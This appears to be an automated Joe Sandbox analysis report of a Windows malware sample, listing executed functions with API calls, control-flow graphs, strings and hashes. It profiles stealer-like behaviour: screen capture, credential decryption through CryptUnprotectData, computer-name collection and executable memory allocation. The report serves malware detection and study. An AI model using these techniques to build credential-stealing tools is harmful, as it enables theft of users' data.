18255 434f35 RtlAllocateHeap 18256->18255 18256->18256 18257 4341a9 18258 434216 LoadLibraryW 18257->18258 18025 419aec 18026 419afd 18025->18026 18029 419e30 18026->18029 18027 419b74 18030 419e46 18029->18030 18035 419f0b 18029->18035 18031 432120 RtlAllocateHeap 18030->18031 18030->18035 18032 419f67 18031->18032 18032->18032 18033 436e10 3 API calls 18032->18033 18034 419fdf 18033->18034 18034->18035 18036 432120 RtlAllocateHeap 18034->18036 18035->18027 18037 419fef 18036->18037 18038 4372f0 2 API calls 18037->18038 18039 41a003 18038->18039 18041 432120 RtlAllocateHeap 18039->18041 18045 41a03f 18039->18045 18040 41a104 NtAllocateVirtualMemory 18042 41a199 NtFreeVirtualMemory 18040->18042 18043 41a04e 18041->18043 18042->18035 18043->18043 18046 4091c0 18043->18046 18045->18035 18045->18040 18047 4091dc 18046->18047 18048 432120 RtlAllocateHeap 18047->18048 18049 409234 18048->18049 18052 405670 18049->18052 18055 405700 18052->18055 18054 4056ec 18054->18045 18056 405751 18055->18056 18057 4057ec 18056->18057 18058 4034c0 HeapCreate 18056->18058 18057->18054 18058->18057 18059 41356f 18060 413580 18059->18060 18061 418c50 3 API calls 18060->18061 18062 413682 18061->18062 18063 405670 18064 405700 HeapCreate 18063->18064 18065 4056ec 18064->18065 18066 40eb70 18067 40eb75 18066->18067 18068 432120 RtlAllocateHeap 18067->18068 18069 40eb96 18068->18069 18260 4090b0 18261 4090ba 18260->18261 18263 4090df GetStdHandle 18261->18263 18264 4090d2 18261->18264 18262 409128 ExitProcess 18263->18264 18264->18262 18265 4381b0 18266 4381d0 18265->18266 18266->18266 18274 438470 18266->18274 18269 432120 RtlAllocateHeap 18271 43822b 18269->18271 18270 438264 NtAllocateVirtualMemory 18272 438312 NtFreeVirtualMemory 18270->18272 18271->18270 18273 43825f 18271->18273 18272->18273 18275 438212 18274->18275 18276 438489 18274->18276 18275->18269 18275->18273 18276->18275 18277 4384bc NtAllocateVirtualMemory 18276->18277 18278 43855e NtFreeVirtualMemory 18277->18278 18278->18275 18070 433cf7 18071 433d07 18070->18071 18072 433d30 NtOpenSection 18071->18072 18279 4275b6 18280 4276d6 18279->18280 18281 42771d SysAllocString 18279->18281 18280->18281 18282 42778f 18281->18282 18283 416e36 18285 416e44 18283->18285 18288 416d2f 18283->18288 18284 416d5f 18286 416c80 NtAllocateVirtualMemory 18285->18286 18285->18288 18289 416d10 NtFreeVirtualMemory 18286->18289 18287 416d70 NtAllocateVirtualMemory 18290 416e00 NtFreeVirtualMemory 18287->18290 18288->18284 18288->18287 18289->18288 18290->18284 18073 415a7b 18076 4371c0 18073->18076 18077 415a8b 18076->18077 18079 4371e2 18076->18079 18078 437204 NtAllocateVirtualMemory 18080 4372a2 NtFreeVirtualMemory 18078->18080 18079->18077 18079->18078 18080->18077

                                              Executed Functions

                                              Function 0042B190 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 76windowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetDC.USER32(00000000), ref: 0042B19E
                                              • KiUserCallbackDispatcher.NTDLL(0000004C), ref: 0042B1AE
                                              • GetSystemMetrics.USER32(0000004D), ref: 0042B1B6
                                              • GetCurrentObject.GDI32(00000000,00000007), ref: 0042B1BF
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0042B1CF
                                              • DeleteObject.GDI32(00000000), ref: 0042B1E6
                                              • CreateCompatibleDC.GDI32(00000000), ref: 0042B1ED
                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0042B1FB
                                              • SelectObject.GDI32(00000000,00000000), ref: 0042B207
                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 0042B22A
                                              • SelectObject.GDI32(00000000,00000000), ref: 0042B232
                                              • DeleteDC.GDI32(00000000), ref: 0042B239
                                              • ReleaseDC.USER32(00000000,00000000), ref: 0042B242
                                              • DeleteObject.GDI32(00000000), ref: 0042B249
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: Object$Delete$CompatibleCreateSelect$BitmapCallbackCurrentDispatcherMetricsReleaseSystemUser
                                              • String ID: Qp$Qp
                                              • API String ID: 2925702150-1053766494
                                              • Opcode ID: 8fa0317cbb1f235bf63e6316c6b3c27b168894cc8a4fa074e40fe7e36b03dc68
                                              • Instruction ID: f54efbe70d01e80acca420d4f96a3a0cba323340c53da5fefc1411cf757e91d7
                                              • Opcode Fuzzy Hash: 8fa0317cbb1f235bf63e6316c6b3c27b168894cc8a4fa074e40fe7e36b03dc68
                                              • Instruction Fuzzy Hash: 98215732504304AFE3009FA09C49F6F7BE8FFC9782F005429FB85922A0D77499018BEA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00409BC0 Relevance: 11.7, Strings: 9, Instructions: 455COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 182 409bc0-409bd3 183 409bd9-409be5 182->183 184 40a2ea-40a2f1 182->184 185 409c15-409c22 183->185 186 409be7-409be9 183->186 189 409c6f-409d08 call 406bf0 call 430570 call 432120 185->189 187 409c24-409c2b 186->187 188 409beb-409c13 186->188 190 409c2d-409c42 187->190 191 409c44-409c6a 187->191 188->190 198 409d58-409dab call 4093f0 189->198 199 409d0a 189->199 190->189 191->189 203 409de8-409e35 call 4093f0 198->203 204 409dad-409daf 198->204 200 409d10-409d56 199->200 200->198 200->200 208 409e37 203->208 209 409e7a-409ed0 call 4093f0 203->209 205 409db0-409de6 204->205 205->203 205->205 210 409e40-409e78 208->210 213 409ed2 209->213 214 409f18-409f5c 209->214 210->209 210->210 215 409ee0-409f16 213->215 216 409fa0-409ff9 call 4093f0 214->216 217 409f5e-409f5f 214->217 215->214 215->215 221 40a036-40a1ca call 409720 216->221 222 409ffb 216->222 218 409f60-409f9e 217->218 218->216 218->218 226 40a22a-40a277 221->226 227 40a1cc-40a1cf 221->227 223 40a000-40a034 222->223 223->221 223->223 229 40a2b9-40a2db call 40ecd0 call 408a40 226->229 230 40a279 226->230 228 40a1d0-40a228 227->228 228->226 228->228 235 40a2e0-40a2e3 229->235 231 40a280-40a2b7 230->231 231->229 231->231 235->184
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0$CpMN$E{$H$KDLG$NM$p){/$pC$s@KD
                                              • API String ID: 0-4175016407
                                              • Opcode ID: cf5f581693ce0c35836e21c04a86ec43d2ae26d41c5d11b0bee5ed4b2add4334
                                              • Instruction ID: 593d47b696e48009b196531727b483cbc570187d62b569d21515eb0d4df575d0
                                              • Opcode Fuzzy Hash: cf5f581693ce0c35836e21c04a86ec43d2ae26d41c5d11b0bee5ed4b2add4334
                                              • Instruction Fuzzy Hash: AE1223B02083819BE318CF15C4A476FBBE2BBC5348F545D2DE4D69B292C779D809CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004162C7 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 205COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 236 4162c7-41634a call 4021d0 239 416383-41639b call 402590 236->239 240 41634c-41634f 236->240 244 4163a0-4163b0 239->244 241 416350-416381 240->241 241->239 241->241 244->244 245 4163b2-4163ce 244->245 246 4163d0-4163d5 245->246 247 4163d7 245->247 246->247 248 4163d8-4163f2 246->248 247->248 249 4163f4-4163f9 248->249 250 4163fb 248->250 249->250 251 4163fc-416422 call 432120 249->251 250->251 254 4165d7-416644 call 436470 CryptUnprotectData 251->254 255 416428-41642f 251->255 257 416452-416497 call 4112f0 * 2 255->257 263 416440-41644c 257->263 264 416499-4164b8 call 4112f0 257->264 263->254 263->257 264->263 267 4164ba-4164e1 264->267 268 416431-416438 267->268 269 4164e7-416506 call 4112f0 267->269 268->263 269->263 272 41650c-416522 269->272 272->263
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: or]`$ql$uuMx$v|vs$~t~{
                                              • API String ID: 0-1582885218
                                              • Opcode ID: c181e7baaf082f6428e812a5d5f9e31a2e4b373f2c4feb82862eab39c2d3272c
                                              • Instruction ID: c3fe3dd357e1b51b6db3ae82e86e280a51a78cc92652de4e3c93f7c0870a25bc
                                              • Opcode Fuzzy Hash: c181e7baaf082f6428e812a5d5f9e31a2e4b373f2c4feb82862eab39c2d3272c
                                              • Instruction Fuzzy Hash: 4B71D3B15083818FD724CF28C48175BBBE2AF95308F194A6EE5E58B392D738D845CB5B
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004322C0 Relevance: 7.8, APIs: 5, Instructions: 267memorynativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 292 4322c0-4322e1 293 4322e7-4322f2 292->293 294 4325ed-4325f6 292->294 295 432300-432307 293->295 296 432314-4323db NtAllocateVirtualMemory NtFreeVirtualMemory 295->296 297 432309-43230d 295->297 296->294 300 4323e1-432435 296->300 297->295 298 43230f 297->298 298->294 301 432467-432487 RtlAllocateHeap 300->301 302 432437 300->302 304 4325e4-4325ea call 4321c0 301->304 305 43248d-4324a5 301->305 303 432440-432465 302->303 303->301 303->303 304->294 306 4324b0-4324b7 305->306 308 4324c4-43257b NtAllocateVirtualMemory NtFreeVirtualMemory 306->308 309 4324b9-4324bd 306->309 314 4325c7-4325c9 308->314 315 43257d-432581 308->315 309->306 311 4324bf 309->311 312 4325e0 311->312 312->304 314->304 316 432590-432598 315->316 317 4325a0-4325ab 316->317 318 4325b5-4325b8 317->318 319 4325ad-4325b3 317->319 320 4325cb-4325de 318->320 321 4325ba-4325be 318->321 319->317 319->318 320->312 321->316 322 4325c0-4325c5 321->322 322->312
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0043237C
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 004323CF
                                              • RtlAllocateHeap.NTDLL(?,00000000,00000000), ref: 00432474
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,0000BA00,00003000,00000040), ref: 00432520
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000010,00008000), ref: 00432573
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$Allocate$Free$Heap
                                              • String ID:
                                              • API String ID: 996896184-0
                                              • Opcode ID: b2894881f8f3a2d054d551cd58e2212bfdc3c027fc13e287b51561f8e5d4265e
                                              • Instruction ID: 5c95c92c20dc59c6664c2e2f7ecdf8d1e8d1edc756b4fbec66f64321349345c8
                                              • Opcode Fuzzy Hash: b2894881f8f3a2d054d551cd58e2212bfdc3c027fc13e287b51561f8e5d4265e
                                              • Instruction Fuzzy Hash: F691AD75108300AFE700CF18C954B5BBBE5FB89728F148A1DF9A89B391D774D909CB9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004226A4 Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 657COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 323 4226a4-4226bb 325 422714-422723 323->325 326 4226bd-4226d4 323->326 327 42276f 325->327 328 4226d6 326->328 329 422725 326->329 330 422770-422779 327->330 332 4226e0-422710 328->332 331 422727-42272e 329->331 330->330 333 42277b-422805 330->333 335 422730-422740 331->335 336 42274b-422769 331->336 332->332 334 422712 332->334 337 422807 333->337 338 42284f-422858 333->338 334->331 339 422742-422749 335->339 340 42276b-42276d 335->340 336->339 336->340 341 422810-42284d 337->341 342 42285a 338->342 343 42286b-422877 338->343 339->327 340->327 340->333 341->338 341->341 344 422860-422869 342->344 345 42288b-422896 343->345 346 422879-42287f 343->346 344->343 344->344 349 4228a1-422931 call 436470 345->349 350 422898-42289e call 408a40 345->350 347 422880-422889 346->347 347->345 347->347 356 422933 349->356 357 422988-422991 349->357 350->349 358 422940-422986 356->358 359 422993-422999 357->359 360 4229ab-4229b7 357->360 358->357 358->358 361 4229a0-4229a9 359->361 362 4229cb-4229f9 call 408ac0 call 436470 360->362 363 4229b9-4229bf 360->363 361->360 361->361 368 4229fe-422a08 362->368 364 4229c0-4229c9 363->364 364->362 364->364 369 422a0b-422a60 368->369 370 422a62 369->370 371 422aa5-422aae 369->371 372 422a70-422aa3 370->372 373 422ab0-422ab6 371->373 374 422acb-422ad7 371->374 372->371 372->372 375 422ac0-422ac9 373->375 376 422aeb-422af9 call 436470 374->376 377 422ad9-422adf 374->377 375->374 375->375 380 422afe-422b7f GetComputerNameExA 376->380 378 422ae0-422ae9 377->378 378->376 378->378 381 422bd3-422bdc 380->381 382 422b81 380->382 384 422bfb-422c07 381->384 385 422bde-422be4 381->385 383 422b90-422bd1 382->383 383->381 383->383 387 422c1b-422c9d GetComputerNameExA 384->387 388 422c09-422c0f 384->388 386 422bf0-422bf9 385->386 386->384 386->386 390 422ce9-422cf2 387->390 391 422c9f 387->391 389 422c10-422c19 388->389 389->387 389->389 393 422cf4-422cff 390->393 394 422d0d 390->394 392 422ca0-422ce7 391->392 392->390 392->392 396 422d00-422d09 393->396 395 422d0f-422d1b 394->395 398 422d3b-422dc3 395->398 399 422d1d-422d23 395->399 396->396 397 422d0b 396->397 397->395 402 422e10-422e19 398->402 403 422dc5 398->403 400 422d30-422d39 399->400 400->398 400->400 405 422e3b-422e47 402->405 406 422e1b-422e21 402->406 404 422dd0-422e0e 403->404 404->402 404->404 408 422e5b-422ec9 call 436470 405->408 409 422e49-422e4f 405->409 407 422e30-422e39 406->407 407->405 407->407 414 422f16-422f1f 408->414 415 422ecb 408->415 410 422e50-422e59 409->410 410->408 410->410 417 422f21-422f27 414->417 418 422f3b-422f4c 414->418 416 422ed0-422f14 415->416 416->414 416->416 419 422f30-422f39 417->419 420 422f68-422f73 418->420 419->418 419->419 421 422ffa-422ffc 420->421 422 422f79-422f80 420->422 425 423000-42305f 421->425 423 422f82-422f99 422->423 424 422f50-422f54 422->424 427 422fc0-422fc8 423->427 428 422f9b-422f9e 423->428 426 422f59-422f62 424->426 429 423061 425->429 430 4230b8-4230c1 425->430 426->420 434 422ffe 426->434 427->426 435 422fca-422ff5 427->435 428->427 436 422fa0-422fbc 428->436 431 423070-4230b6 429->431 432 4230c3-4230c9 430->432 433 4230db-4230de call 4284d0 430->433 431->430 431->431 437 4230d0-4230d9 432->437 439 4230e3-4230ff 433->439 434->425 435->426 436->426 437->433 437->437
                                              APIs
                                              • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 00422B1D
                                              • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00422C3A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: ComputerName
                                              • String ID: ido1$kvri
                                              • API String ID: 3545744682-1372408504
                                              • Opcode ID: f65a3c888cac63b7f75acb57a02f369a9874bfff2bca6b5a80168ecacc476a3f
                                              • Instruction ID: b9d25a0b2fa920701055d01af86ece80d2b98a3712395f2c0edf970d086a02d1
                                              • Opcode Fuzzy Hash: f65a3c888cac63b7f75acb57a02f369a9874bfff2bca6b5a80168ecacc476a3f
                                              • Instruction Fuzzy Hash: AB327D70104B929AE725CF34C594BE3BBE1AF16309F4449ADD0FB8B282D7B9604ACB55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004226A7 Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 645COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 00422B1D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: ComputerName
                                              • String ID: ido1$kvri
                                              • API String ID: 3545744682-1372408504
                                              • Opcode ID: 97d47b0abb8866480f44754dc735a4b115dcf3b84d48fbb1c07c0b21aa749e4a
                                              • Instruction ID: aee5f226c6f28335b0b116f7373c29df55dc501608c7967c220329754ed2b793
                                              • Opcode Fuzzy Hash: 97d47b0abb8866480f44754dc735a4b115dcf3b84d48fbb1c07c0b21aa749e4a
                                              • Instruction Fuzzy Hash: 6C327C70104B929AE725CF34C594BE3BBE1BF16309F84496DD0FB8B282D7B9604ACB55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00421FEE Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 624COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 00422B1D
                                              • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00422C3A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: ComputerName
                                              • String ID: ido1$kvri
                                              • API String ID: 3545744682-1372408504
                                              • Opcode ID: 8ce99b25c8e92c780c8398b980d499503a4318c2435ec1036843c074f629d874
                                              • Instruction ID: 9913d53f075df48d2ed55c36269c1905ce86d6754282f6a88588e489a2a79f56
                                              • Opcode Fuzzy Hash: 8ce99b25c8e92c780c8398b980d499503a4318c2435ec1036843c074f629d874
                                              • Instruction Fuzzy Hash: 57228B70204B529AD725CF34C594BE3BBE1BF16308F84496DD0FB8B282D7B9644ACB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00436E10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 142nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00436F65
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 00436FD7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: ,$@
                                              • API String ID: 292159236-1227015840
                                              • Opcode ID: 53923adbfc6a9447e3dec5e387ccc6740b80307ad046d8bf83a3d17f7ae25900
                                              • Instruction ID: a03adac2527827931d70b2d8102014d7bcc0190a79fe1e5a52ac9dc4f4ed79cd
                                              • Opcode Fuzzy Hash: 53923adbfc6a9447e3dec5e387ccc6740b80307ad046d8bf83a3d17f7ae25900
                                              • Instruction Fuzzy Hash: 0F419EB5108705AFD710DF14C845B5BB7E4FF89328F158A1DF5A89B2E0E3789908CB5A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041EFD0 Relevance: 6.4, APIs: 4, Instructions: 379nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0041F07B
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 0041F0D2
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0041F191
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000010,00008000), ref: 0041F1E4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 988d82ec1be1251bf1e19389caf0e615a9020e2a2eefa36418a8890b43a17d63
                                              • Instruction ID: e0a7e9d02992bacbfa89f012523281f6694a55907a4fe32b1b9819e25999660c
                                              • Opcode Fuzzy Hash: 988d82ec1be1251bf1e19389caf0e615a9020e2a2eefa36418a8890b43a17d63
                                              • Instruction Fuzzy Hash: 25D1E1B15083118FE710CF18C84075BBBE1EF85714F14892EF9A987391E3B9D849CB9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004376C0 Relevance: 6.2, APIs: 4, Instructions: 250nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00437765
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 004377C3
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 0043788A
                                              • NtFreeVirtualMemory.NTDLL(000000FF,000000B8,00000000,00008000), ref: 004378E7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 78e115569172ad7b1383508404512725b96c03b541836f3b22e10cdef29cebae
                                              • Instruction ID: a3998fc49f3a29dc41672aef55df02be8577918d35f6a965ab30e23c2c06a20e
                                              • Opcode Fuzzy Hash: 78e115569172ad7b1383508404512725b96c03b541836f3b22e10cdef29cebae
                                              • Instruction Fuzzy Hash: C3817DB15083119BD720CF18C880B1BBBE5FF88364F148A2DF9D99B3A4D7759905CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00416C80 Relevance: 6.1, APIs: 4, Instructions: 116nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,000000B8,00003000,00000040), ref: 00416CDF
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 00416D29
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,000000B8,00003000,00000040), ref: 00416DCF
                                              • NtFreeVirtualMemory.NTDLL(000000FF,5C3924FC,?,00008000), ref: 00416E19
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 1f5346bfd5473f7189cceb156e0dfdd0080e9732f7f8fff6eb63901ab5151a48
                                              • Instruction ID: 4d9873f1e8f3d9a4bd9b21028fb075ddc7448c9c55893d116057c94cd1fa03ba
                                              • Opcode Fuzzy Hash: 1f5346bfd5473f7189cceb156e0dfdd0080e9732f7f8fff6eb63901ab5151a48
                                              • Instruction Fuzzy Hash: CA4159B51087409FE700CF14C844B5EB7E8FB88318F544A2CF6A99B3A0D778D908CB9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00404AB0 Relevance: 5.5, Strings: 4, Instructions: 506COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: )$IDAT$IEND$IHDR
                                              • API String ID: 0-3181356877
                                              • Opcode ID: fb630df48ca3033b79c02fb00a64a73d56955321e1a63e46bd51af0f576cf898
                                              • Instruction ID: d068175341bdd85addb62140043e081e60031e9b3d8bc5fa1852449108c15d4e
                                              • Opcode Fuzzy Hash: fb630df48ca3033b79c02fb00a64a73d56955321e1a63e46bd51af0f576cf898
                                              • Instruction Fuzzy Hash: 98120FB16083408FD718CF29D85076B7BE0EF85304F15866EEA869B3D2D779D909CB86
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00436FF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00437145
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 004371A2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: @
                                              • API String ID: 292159236-2766056989
                                              • Opcode ID: 069b9fb449dddb6217d2742d095e2f69666d70c1a405a54f3b0178c2de4aff6e
                                              • Instruction ID: 3470ca7a32e557e73fc606eae0d4ee44461d9084059e7f1d5ad2a83f520c0dea
                                              • Opcode Fuzzy Hash: 069b9fb449dddb6217d2742d095e2f69666d70c1a405a54f3b0178c2de4aff6e
                                              • Instruction Fuzzy Hash: 9D415BB61087049FD710CF14C844B1BB7E4EF89368F559A1DF9A89B3A0E3799908CB97
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00437550 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00437655
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 004376A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: @
                                              • API String ID: 292159236-2766056989
                                              • Opcode ID: 2f6ba8cee97a2f9810962fc78690305e3b4e58b623afafa70e25634a7e200208
                                              • Instruction ID: 29f5291566ca971277157fc3e76b40e99f649943cb0cdb06902f21baea30c39a
                                              • Opcode Fuzzy Hash: 2f6ba8cee97a2f9810962fc78690305e3b4e58b623afafa70e25634a7e200208
                                              • Instruction Fuzzy Hash: 5B416DB65087109FD310CF14C844B1BBBE4FB89368F008A2DF9A9A7390D374D9088B97
                                              Uniqueness

                                              Uniqueness Score: -1.00%

